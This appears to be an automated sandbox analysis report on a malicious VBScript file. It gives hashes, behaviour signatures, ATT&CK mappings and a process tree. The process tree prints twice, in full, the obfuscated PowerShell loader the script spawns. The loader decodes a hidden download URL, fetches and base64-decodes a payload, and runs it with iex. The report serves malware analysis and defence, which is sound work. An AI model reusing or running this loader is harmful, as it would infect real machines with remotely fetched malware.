Analysis

  • max time kernel
    166s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-03-2024 18:39

General

  • Target

    assento 555 pro-Model-2.vbs

  • Size

    37KB

  • MD5

    97c163bbb028e2bb1439bbe5e9497cfe

  • SHA1

    a69c484d867309e1d36f88f0edcca3cb155e25b8

  • SHA256

    e74c7eeb8441dcc8faf37169cd15805f10b6a21c9982d8395728f5978622f982

  • SHA512

    64e1444c4862392660ff697805b3817fcb7f5db21cb6a1cb56ed4b4e4e8e10ae067cb6c8b79dbec5a4affeb6d5b618aed0fdd87b92f489be23890236d9e6ff7e

  • SSDEEP

    384:u09gBJmUIWz0AujGKoCJmMuttrW6ku83V3aiHwMgz0YaXBP2a+eGHz4b467QiBAc:u09gBJEWAZGc8NnKwiQxwZY36cuA+yBC

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\assento 555 pro-Model-2.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3532
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Iracundulous Operationsplans Unvisually dripstick #>;$Augustes=(cmd /c set /A 115^^0);Function Unperspirable ([String]$Fartbde){$Mapau=[char][int]$Augustes+'ubstring';$Musicality=8;$Sengelinnedet=Deductibles($Fartbde);For($Miminypiminy=7; $Miminypiminy -lt $Sengelinnedet; $Miminypiminy+=$Musicality){$Fdeegnenes=$Fartbde.$Mapau.Invoke($Miminypiminy, 1);$Lacrimatory64=$Lacrimatory64+$Fdeegnenes;}$Lacrimatory64;}function Inkhornizer ($contenders){. ($Scribbet) ($contenders);}function Deductibles ([String]$henvisningsstreg){$Utvetydighedernes=$henvisningsstreg.Length-1;$Utvetydighedernes;}$Cirsith=Unperspirable 'Eist.ddT Disembr bu,sitaMatchsan SinknisIsoheltfNonre ieSt iberrKompletr ElendiiLyksa.inRendemagHelsece ';$Attraktioner=Unperspirable 'TvangsfhAirdroptLun,ecot mulgep Mel tas Rastsm:chekken/Nahu,tl/ rapsfrdS.rigler AmazoniNse cravEctoblaeTwiggin.Hove stgUnfrockoSan stooprocentgPicktrelMed.tudeEpistle..ohnnyccIndhentoDeeaftamAttribu/ Ant.rauTeo oficSequens?Skrabtee fu orexTilgivep PriedioRecomp rD istebtKniplen=BeskyttdH.rvardoStableswTrlggennrei.corlWoodnoto H flevaGeschftdAircraf& Tulipoi Sn tykdAbso,bi=Efflr s1Bemande7Tanginen MagistW The mo7 TerresmDemonst1DemokrawSkraapu4KtterneV EmulsiHOptaltexStateliRGv nkle0 Morska3 CongoufAlcofor9Be mmes9KursivemPaatnktfParensa6Fods,or0Sk,dgar6MedalliG asmine5shiismb2A.ndeagrH,delseTPrvetek2U.nouriE mockerPtrontalACamcordY Brid,m ';$Scribbet=Unperspirable 'WeltedbiTerapieeBlaabrsx Boucha ';$Graaligt=Unperspirable 'Fngslin$ Fotogrg ManagelOverflaoBroomrab CodeteaUnde.aflWi,nabl: ractleBPakningrMyxo.laaFondsdisundereni utonoelAnnexbriLgehuseaAukje in svedkiePostclirBlasert2,psvulm2 ,ragef0 Tertir Sko dpu=Ski,tet FireworSTridenttGraupela RubellrS,lvhjutBrains,-P,etetsBKlunk siOverpe.tDvledessgteskabTCallistrSungcouaDurskaln UndlivsBlindebfUnt.nsieKrltopprUnwedsl .rythr-M.ssayiS Didymio MonotruRig ererCiderencGigabyteMicrurg Metamor$Doer.boASkrammet SpejlitprimtalrEquin aaPhotorekGru pestCloisteiKam luloTilsmagnIsochroeGo.inesrCabuyab Vealero-rengr.nDErklrineHarpnins Stockht ,urraciSpinatfnYnkso saEtiopietHjemfreiStarosto ercutinobligat A,olesc$StregniLNegropheVarmeduvSpildeveOmdiskurFac,piemAlternaaUnd,rtenUnpa ed ';Inkhornizer (Unperspirable 'Tylop.d$U veracgRechartlVitaminoamtsavibradiodyaOmtaag lLisping:OreodonLEs adree Likv dvza ersseAchedtrrMaggedrmBambisuaStormomnkarting=Soma.ro$Xerophie MensennDiakonivSerpent:Besky taStartp.pkolo.ispvolplandEntrepoaParat yt marrama ootfo ') ;Inkhornizer (Unperspirable ' KaktusINonc.ntmNogheadpSixth yoRaftervr Viti.utSer.efr-loharjoMSten.igoSeedfuldRedevisuEgnstealBrattineFolketi EmpirekB,wirlyai Spat etOsseouss BalancT educearMiswandaLitteranReintersUpstre fAnnb iteUdh linrTrosart ') ;$Leverman=$Leverman+'\Aktualiserende.Brn' ;Inkhornizer (Unperspirable 'Ukasega$ brormag .orurelCircasso Unkni bf.askega GnotoblRepro u: MatrosuDepressn Gastertsamlebarreserveiskydel,bVandr,luAquilegtPhyllopaEnvoyeerUnfoundyFrapper=Mun,res(Pr.contTShawledeAbsencesStudentt Bant m-MegalogP fi.briaRepagantColumneh Hjemme Bet.lin$UnderviL forsteethybornvMassivees emninrUrethromPalmegradioxinunSek aar).ndersl ') ;while (-not $untributary) {Inkhornizer (Unperspirable 'banderoI EmerysfKovendi real,ze(Brl,ren$Eucry tBRackangryork.hiaNonr ctsH.rtigkiFeltnuml RufleniDeleligaDnningenObbeniteDecametrMicrome2Tullenh2 Dobb l0Neph,ot.DelikatJReconsioGenanveb AntiflS Unl.pjt teromaabarbaritHomoo seAngled. indecor-Pois rseHavarisq Ectozo Rnkers$VkkelseCOpsoni iScorninrTalmudiselectroiCo,voketPirrelihattribu)Aabning Fre lan{AabenthSwic tant SikkeraD.tunesrPota,oetGen.ang-UdskejeSMout,fulC,toniceCollapseFennernpEmbleme Peramel1Jumblyt}S klubse tilb,glUdgiversTusindeeAfgrund{BulteriSbias.ngtTropemoaVejpl.drNonexcut Stikke-indkredSFordelilElementeFarverieReferripSpringe Skibuks1 s,umfi; IllustIPacificnDefoamekFrighteh ropforoAtaxyekr Skotjsn Bij uti o erexzSubtarseSkilletrBetegne aturfr$DepersoGSletbagrUnvocalaStadsaraServ celGambadeiDrum yngN,negostNi kysi} Fawner ');Inkhornizer (Unperspirable 'Afvan,r$TendancgG.flendl tatueroProbatibnideshaaPaaa,telFljtek,:W ckalcuKumeniknReg aratAfskrivrMerkantiSekt.rib.rnlednuTurbidltheadshia.arantirObsidiayGametop= T,gole(graatonTRespotse LetchysNonty.at Icef,l-KomplemPHandleaahex,dectTikampehIndexle Elsdyre$ GgehviLZoochoreDeruralv Spl nieNe dmperFreeloamAfskendaOplevernCardiga)Pulpiti ') ;}Inkhornizer (Unperspirable '.immeri$Kofilnagsta,usolGlassitoRadiablbSkambytamrkeligl Em.ral: Udste T D.gitaeAntsiesi ,poistsUnhymenm Str,dsePro ellnbranchi Phi.ant= Me,aph ormaliGFrstestePrehungtQabbala-ViceamtCLym,hyrob aanernInsertetAortopteFarveb,nNabogrutOp,rkso finansi$,uditorL Unhy,eeUngulpgvSituatieBielectralbatiom ,neakeaUnbash,n Indtrr ');Inkhornizer (Unperspirable 'Zincode$ Tuf sdgDirigenlUd.kudsoAftrykkb Debut,a SuffralTuborgs:AftersoB BensaiePolliworUnfi.icaSelvbedtMarenteiPupillon ImpervgFortryl Liniede= Idrift Utugtsf[SteningSNokke,ay UncompsTorobe,tFlegm tePri,termTictock. ImmateCSlangkooJudasesnLynchnivDialakteAmalg mr.edensktI.capsu] Martyr:Rigsaeb:D,preciFTabuingrPrototyoPhenelzmRemobilBSchantzaTow,shas.ismindeMisconn6Viceins4 Colle,S.daptattSvederer MusteeiPad,inonHedernegNormere(Slgerpa$DorosceTS hiwale.lektroiPostwars Dunst.mBearnaieGara.tinforhand)Lbesode ');Inkhornizer (Unperspirable 'Blokstr$indan ng Dechifl Aftagno finansbUmbellaaLaconiclOpspari:Konspi.SjequirinLefle,er formasePa ketgbEstami,aDe.yafsaMimrendnMisfatedgashouseMikrodat GaloppsAccel r Scribbl=Drummon Citrin [PraktikSF.nesnyyM,nnesks.hatnottMarioneeCoordinmNonunci. Tagme TBackfire PrecloxNigherrtAarsskr.NoncorrEAllissmnHeidlsvcGennemsoGolfs,rdProaviaiG,ntlemnSprhj lg Anted,] N.kked:Helbred:MisgoveASaxofonSDefinitCDem,kraITllerneIRigelig.U ykkesGHje,mepe GipsertTru selSTikantetGranulerMenigheiTodosaan Erikn g Habitu(Vinding$Trres.aBVandkmme DrikkerPlsebaraBnne netCloseabiDidascanSv,gescgCasual.)Bereds ');Inkhornizer (Unperspirable 'Primsig$ExcystagSouff,alThailanoStikordbArbejdsaRokkestlout ulk: ChaussP PlaquerAlludi.oCongo,ejFootweaeBran,vscPosturit umshyoc.rnhusr F rvelsSprogsa=Meanlys$UndergiSCloamennHusar,er fricaneSkrumleb Billiga ranklaskjultenOmredigdOoph.reelicencet Flkke,sdetract.TaxinglsKavalkauSelvbesbFlyvrtis FremkotKortuldrPro otyiDigteren Unfor.gJu enal( Imitat3Fo,ecab4Favoure3Udstill0Gippeds4Unpathe9Fugti.h,Dissimi3Progr s2 Kl,dre5Mispenn2F,ynseg1Tidsbeg)Foreyea ');Inkhornizer $Projectors;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:1652
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Iracundulous Operationsplans Unvisually dripstick #>;$Augustes=(cmd /c set /A 115^^0);Function Unperspirable ([String]$Fartbde){$Mapau=[char][int]$Augustes+'ubstring';$Musicality=8;$Sengelinnedet=Deductibles($Fartbde);For($Miminypiminy=7; $Miminypiminy -lt $Sengelinnedet; $Miminypiminy+=$Musicality){$Fdeegnenes=$Fartbde.$Mapau.Invoke($Miminypiminy, 1);$Lacrimatory64=$Lacrimatory64+$Fdeegnenes;}$Lacrimatory64;}function Inkhornizer ($contenders){. ($Scribbet) ($contenders);}function Deductibles ([String]$henvisningsstreg){$Utvetydighedernes=$henvisningsstreg.Length-1;$Utvetydighedernes;}$Cirsith=Unperspirable 'Eist.ddT Disembr bu,sitaMatchsan SinknisIsoheltfNonre ieSt iberrKompletr ElendiiLyksa.inRendemagHelsece ';$Attraktioner=Unperspirable 'TvangsfhAirdroptLun,ecot mulgep Mel tas Rastsm:chekken/Nahu,tl/ rapsfrdS.rigler AmazoniNse cravEctoblaeTwiggin.Hove stgUnfrockoSan stooprocentgPicktrelMed.tudeEpistle..ohnnyccIndhentoDeeaftamAttribu/ Ant.rauTeo oficSequens?Skrabtee fu orexTilgivep PriedioRecomp rD istebtKniplen=BeskyttdH.rvardoStableswTrlggennrei.corlWoodnoto H flevaGeschftdAircraf& Tulipoi Sn tykdAbso,bi=Efflr s1Bemande7Tanginen MagistW The mo7 TerresmDemonst1DemokrawSkraapu4KtterneV EmulsiHOptaltexStateliRGv nkle0 Morska3 CongoufAlcofor9Be mmes9KursivemPaatnktfParensa6Fods,or0Sk,dgar6MedalliG asmine5shiismb2A.ndeagrH,delseTPrvetek2U.nouriE mockerPtrontalACamcordY Brid,m ';$Scribbet=Unperspirable 'WeltedbiTerapieeBlaabrsx Boucha ';$Graaligt=Unperspirable 'Fngslin$ Fotogrg ManagelOverflaoBroomrab CodeteaUnde.aflWi,nabl: ractleBPakningrMyxo.laaFondsdisundereni utonoelAnnexbriLgehuseaAukje in svedkiePostclirBlasert2,psvulm2 ,ragef0 Tertir Sko dpu=Ski,tet FireworSTridenttGraupela RubellrS,lvhjutBrains,-P,etetsBKlunk siOverpe.tDvledessgteskabTCallistrSungcouaDurskaln UndlivsBlindebfUnt.nsieKrltopprUnwedsl .rythr-M.ssayiS Didymio MonotruRig ererCiderencGigabyteMicrurg Metamor$Doer.boASkrammet SpejlitprimtalrEquin aaPhotorekGru pestCloisteiKam luloTilsmagnIsochroeGo.inesrCabuyab Vealero-rengr.nDErklrineHarpnins Stockht ,urraciSpinatfnYnkso saEtiopietHjemfreiStarosto ercutinobligat A,olesc$StregniLNegropheVarmeduvSpildeveOmdiskurFac,piemAlternaaUnd,rtenUnpa ed ';Inkhornizer (Unperspirable 'Tylop.d$U veracgRechartlVitaminoamtsavibradiodyaOmtaag lLisping:OreodonLEs adree Likv dvza ersseAchedtrrMaggedrmBambisuaStormomnkarting=Soma.ro$Xerophie MensennDiakonivSerpent:Besky taStartp.pkolo.ispvolplandEntrepoaParat yt marrama ootfo ') ;Inkhornizer (Unperspirable ' KaktusINonc.ntmNogheadpSixth yoRaftervr Viti.utSer.efr-loharjoMSten.igoSeedfuldRedevisuEgnstealBrattineFolketi EmpirekB,wirlyai Spat etOsseouss BalancT educearMiswandaLitteranReintersUpstre fAnnb iteUdh linrTrosart ') ;$Leverman=$Leverman+'\Aktualiserende.Brn' ;Inkhornizer (Unperspirable 'Ukasega$ brormag .orurelCircasso Unkni bf.askega GnotoblRepro u: MatrosuDepressn Gastertsamlebarreserveiskydel,bVandr,luAquilegtPhyllopaEnvoyeerUnfoundyFrapper=Mun,res(Pr.contTShawledeAbsencesStudentt Bant m-MegalogP fi.briaRepagantColumneh Hjemme Bet.lin$UnderviL forsteethybornvMassivees emninrUrethromPalmegradioxinunSek aar).ndersl ') ;while (-not $untributary) {Inkhornizer (Unperspirable 'banderoI EmerysfKovendi real,ze(Brl,ren$Eucry tBRackangryork.hiaNonr ctsH.rtigkiFeltnuml RufleniDeleligaDnningenObbeniteDecametrMicrome2Tullenh2 Dobb l0Neph,ot.DelikatJReconsioGenanveb AntiflS Unl.pjt teromaabarbaritHomoo seAngled. indecor-Pois rseHavarisq Ectozo Rnkers$VkkelseCOpsoni iScorninrTalmudiselectroiCo,voketPirrelihattribu)Aabning Fre lan{AabenthSwic tant SikkeraD.tunesrPota,oetGen.ang-UdskejeSMout,fulC,toniceCollapseFennernpEmbleme Peramel1Jumblyt}S klubse tilb,glUdgiversTusindeeAfgrund{BulteriSbias.ngtTropemoaVejpl.drNonexcut Stikke-indkredSFordelilElementeFarverieReferripSpringe Skibuks1 s,umfi; IllustIPacificnDefoamekFrighteh ropforoAtaxyekr Skotjsn Bij uti o erexzSubtarseSkilletrBetegne aturfr$DepersoGSletbagrUnvocalaStadsaraServ celGambadeiDrum yngN,negostNi kysi} Fawner ');Inkhornizer (Unperspirable 'Afvan,r$TendancgG.flendl tatueroProbatibnideshaaPaaa,telFljtek,:W ckalcuKumeniknReg aratAfskrivrMerkantiSekt.rib.rnlednuTurbidltheadshia.arantirObsidiayGametop= T,gole(graatonTRespotse LetchysNonty.at Icef,l-KomplemPHandleaahex,dectTikampehIndexle Elsdyre$ GgehviLZoochoreDeruralv Spl nieNe dmperFreeloamAfskendaOplevernCardiga)Pulpiti ') ;}Inkhornizer (Unperspirable '.immeri$Kofilnagsta,usolGlassitoRadiablbSkambytamrkeligl Em.ral: Udste T D.gitaeAntsiesi ,poistsUnhymenm Str,dsePro ellnbranchi Phi.ant= Me,aph ormaliGFrstestePrehungtQabbala-ViceamtCLym,hyrob aanernInsertetAortopteFarveb,nNabogrutOp,rkso finansi$,uditorL Unhy,eeUngulpgvSituatieBielectralbatiom ,neakeaUnbash,n Indtrr ');Inkhornizer (Unperspirable 'Zincode$ Tuf sdgDirigenlUd.kudsoAftrykkb Debut,a SuffralTuborgs:AftersoB BensaiePolliworUnfi.icaSelvbedtMarenteiPupillon ImpervgFortryl Liniede= Idrift Utugtsf[SteningSNokke,ay UncompsTorobe,tFlegm tePri,termTictock. ImmateCSlangkooJudasesnLynchnivDialakteAmalg mr.edensktI.capsu] Martyr:Rigsaeb:D,preciFTabuingrPrototyoPhenelzmRemobilBSchantzaTow,shas.ismindeMisconn6Viceins4 Colle,S.daptattSvederer MusteeiPad,inonHedernegNormere(Slgerpa$DorosceTS hiwale.lektroiPostwars Dunst.mBearnaieGara.tinforhand)Lbesode ');Inkhornizer (Unperspirable 'Blokstr$indan ng Dechifl Aftagno finansbUmbellaaLaconiclOpspari:Konspi.SjequirinLefle,er formasePa ketgbEstami,aDe.yafsaMimrendnMisfatedgashouseMikrodat GaloppsAccel r Scribbl=Drummon Citrin [PraktikSF.nesnyyM,nnesks.hatnottMarioneeCoordinmNonunci. Tagme TBackfire PrecloxNigherrtAarsskr.NoncorrEAllissmnHeidlsvcGennemsoGolfs,rdProaviaiG,ntlemnSprhj lg Anted,] N.kked:Helbred:MisgoveASaxofonSDefinitCDem,kraITllerneIRigelig.U ykkesGHje,mepe GipsertTru selSTikantetGranulerMenigheiTodosaan Erikn g Habitu(Vinding$Trres.aBVandkmme DrikkerPlsebaraBnne netCloseabiDidascanSv,gescgCasual.)Bereds ');Inkhornizer (Unperspirable 'Primsig$ExcystagSouff,alThailanoStikordbArbejdsaRokkestlout ulk: ChaussP PlaquerAlludi.oCongo,ejFootweaeBran,vscPosturit umshyoc.rnhusr F rvelsSprogsa=Meanlys$UndergiSCloamennHusar,er fricaneSkrumleb Billiga ranklaskjultenOmredigdOoph.reelicencet Flkke,sdetract.TaxinglsKavalkauSelvbesbFlyvrtis FremkotKortuldrPro otyiDigteren Unfor.gJu enal( Imitat3Fo,ecab4Favoure3Udstill0Gippeds4Unpathe9Fugti.h,Dissimi3Progr s2 Kl,dre5Mispenn2F,ynseg1Tidsbeg)Foreyea ');Inkhornizer $Projectors;"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2956
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:3532

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Command and Control

      Web Service

      1
      T1102

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_guabdhz2.x5k.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/2956-38-0x0000000005510000-0x0000000005520000-memory.dmp
        Filesize

        64KB

      • memory/2956-19-0x0000000002FD0000-0x0000000003006000-memory.dmp
        Filesize

        216KB

      • memory/2956-24-0x00000000061F0000-0x0000000006256000-memory.dmp
        Filesize

        408KB

      • memory/2956-23-0x0000000005A90000-0x0000000005AF6000-memory.dmp
        Filesize

        408KB

      • memory/2956-48-0x0000000007CA0000-0x0000000007CC2000-memory.dmp
        Filesize

        136KB

      • memory/2956-46-0x00000000089E0000-0x0000000008F84000-memory.dmp
        Filesize

        5.6MB

      • memory/2956-45-0x0000000007C30000-0x0000000007C52000-memory.dmp
        Filesize

        136KB

      • memory/2956-44-0x0000000007CE0000-0x0000000007D76000-memory.dmp
        Filesize

        600KB

      • memory/2956-43-0x0000000005510000-0x0000000005520000-memory.dmp
        Filesize

        64KB

      • memory/2956-18-0x0000000075200000-0x00000000759B0000-memory.dmp
        Filesize

        7.7MB

      • memory/2956-20-0x0000000005510000-0x0000000005520000-memory.dmp
        Filesize

        64KB

      • memory/2956-39-0x0000000005510000-0x0000000005520000-memory.dmp
        Filesize

        64KB

      • memory/2956-21-0x0000000005B50000-0x0000000006178000-memory.dmp
        Filesize

        6.2MB

      • memory/2956-22-0x00000000059F0000-0x0000000005A12000-memory.dmp
        Filesize

        136KB

      • memory/2956-49-0x0000000001560000-0x0000000001574000-memory.dmp
        Filesize

        80KB

      • memory/2956-42-0x0000000006F60000-0x0000000006F7A000-memory.dmp
        Filesize

        104KB

      • memory/2956-34-0x00000000062A0000-0x00000000065F4000-memory.dmp
        Filesize

        3.3MB

      • memory/2956-35-0x00000000068E0000-0x00000000068FE000-memory.dmp
        Filesize

        120KB

      • memory/2956-36-0x0000000006A40000-0x0000000006A8C000-memory.dmp
        Filesize

        304KB

      • memory/2956-37-0x0000000075200000-0x00000000759B0000-memory.dmp
        Filesize

        7.7MB

      • memory/2956-40-0x0000000008360000-0x00000000089DA000-memory.dmp
        Filesize

        6.5MB

      • memory/3052-17-0x00000165F4820000-0x00000165F4830000-memory.dmp
        Filesize

        64KB

      • memory/3052-0-0x00000165F47B0000-0x00000165F47D2000-memory.dmp
        Filesize

        136KB

      • memory/3052-11-0x00000165F4820000-0x00000165F4830000-memory.dmp
        Filesize

        64KB

      • memory/3052-10-0x00007FFD4A7A0000-0x00007FFD4B261000-memory.dmp
        Filesize

        10.8MB

      • memory/3052-16-0x00000165F4820000-0x00000165F4830000-memory.dmp
        Filesize

        64KB

      • memory/3052-15-0x00007FFD4A7A0000-0x00007FFD4B261000-memory.dmp
        Filesize

        10.8MB

      • memory/3052-14-0x00000165F6F90000-0x00000165F6FA4000-memory.dmp
        Filesize

        80KB

      • memory/3052-13-0x00000165F6F40000-0x00000165F6F66000-memory.dmp
        Filesize

        152KB

      • memory/3052-12-0x00000165F4820000-0x00000165F4830000-memory.dmp
        Filesize

        64KB